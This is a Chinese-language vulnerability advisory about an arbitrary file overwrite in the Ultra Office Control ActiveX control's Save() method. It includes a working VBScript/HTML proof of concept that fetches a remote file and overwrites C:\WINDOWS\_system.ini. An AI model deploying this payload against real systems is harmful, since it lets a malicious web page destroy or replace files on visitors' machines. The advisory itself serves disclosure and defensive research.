发布日期：2008-08-27
更新日期：2008-08-29

受影响系统：

Ultra Shareware Ultra Office Control 2.0.2008.501

描述：

---

BUGTRAQ  ID: 30863

Ultra Office Control是可用作ActiveX文档容器的标准ActiveX控件，可集成在Visual C++、Visual Basic等语言所开发的应用中显示Office文档。

Ultra.OfficeControl ActiveX控件（OfficeCtrl.ocx，CLSID：{00989888-BB72-4e31-A7C6-5F819C24D2F7}）没有正确地验证对Save()方式所提供的输入参数：

Sub Save (
    [ ByVal SaveAsDocument  As Variant ] ,
    [ ByVal OverwriteExisting  As Variant ] ,
    [ ByVal WebUsername  As Variant ] ,
    [ ByVal WebPassword  As Variant ]
)

如果用户受骗访问了恶意网页并向该方式传送了特制的SaveAsDocument参数的话，就可以覆盖用户系统上的任意文件。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://secunia.com/advisories/31632/
        http://www.shinnai.net/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1219827906.ff.php
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   dim remURL
   remURL = "http://SomeSite.com/SomeFile.doc"
   test.Open remURL, True
   test.Save "C:\WINDOWS\_system.ini", True
End Sub
</script>

建议：

---

厂商补丁：

Ultra Shareware
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ultrashareware.com/Ultra-Office-Control.htm

浏览次数：2362
严重程度：0（网友投票）